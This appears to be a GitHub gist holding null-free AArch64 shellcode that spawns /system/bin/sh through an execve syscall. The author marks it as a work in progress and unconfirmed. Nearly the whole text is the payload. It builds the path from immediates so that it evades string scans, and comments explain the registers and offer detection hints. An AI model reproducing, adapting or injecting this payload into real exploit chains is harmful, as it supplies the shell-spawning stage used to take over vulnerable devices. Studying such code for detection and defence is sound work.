@9re
Last active October 27, 2016 16:09
execve('/system/bin/sh', {'/system/bin/sh', 0}, 0);
// valid AArch64(ARMv8) assembly code.
// No data section and no null bytes, but not yet confirmed to work as shellcode.
// Work in progress.
// Position-independent AArch64 Linux stub that issues
//   execve("/system/bin/sh", {"/system/bin/sh", NULL}, NULL)
// Syntax: GNU as (AArch64); '//' starts a comment.
//
// Register roles at the svc:
//   x0 = pointer to the path string   (written at sp - 0x100)
//   x1 = pointer to the argv array    (written at sp - 0x80)
//   x2 = 0                            (envp = NULL)
//   x8 = 221                          (syscall number; execve in the arm64 Linux table)
//
// Notes for analysis and detection:
//   - The path is assembled from 16-bit immediates, so it never appears as a
//     contiguous string in the code bytes; a plain string scan for
//     "/system/bin/sh" will not match this stub. Look for the movz/movk
//     immediates below instead.
//   - sp itself is never adjusted; both the string and argv are stored below
//     the current stack pointer.
//   - The svc immediate is non-zero (see the last instruction).
.text
.global _start
_start:
// x1 is overwritten by the movz at "mov x1, #0x6962" before it is read,
// so this clear has no effect on the result.
mov x1, xzr
// Build "/system/" in x0, 16 bits at a time (byte order as stored on a
// little-endian target): "/s", "ys", "te", "m/".
mov x0, #0x732f
movk x0, #0x7379, lsl #0x10
movk x0, #0x6574, lsl #0x20
movk x0, #0x2f6d, lsl #0x30
// Build "bin/sh" in x1: "bi", "n/", "sh". The leading mov is a movz, which
// leaves bits 48-63 zero; those two zero bytes act as the NUL terminator.
mov x1, #0x6962
movk x1, #0x2f6e, lsl #0x10
movk x1, #0x6873, lsl #0x20
// Store the 16-byte string "/system/bin/sh\0\0" at sp - 0x100.
stp x0, x1, [sp, #-0x100]
mov x0, xzr                     // x0 = NULL, used as the argv terminator
add x1, sp, #-0x100             // x1 = address of the path string
// argv[0] = path pointer, argv[1] = NULL, stored at sp - 0x80.
stp x1, x0, [sp, #-0x80]
mov x2, xzr                     // envp = NULL
mov x0, x1                      // first argument: path
sub x1, sp, #0x80               // second argument: argv
mov x8, #221                    // syscall number goes in x8
// Linux does not use the svc immediate for syscall dispatch. libc and
// compiler-generated code normally emit "svc #0", so a non-zero immediate such
// as 0x7777 is a useful triage signal when reviewing captured code.
svc #0x7777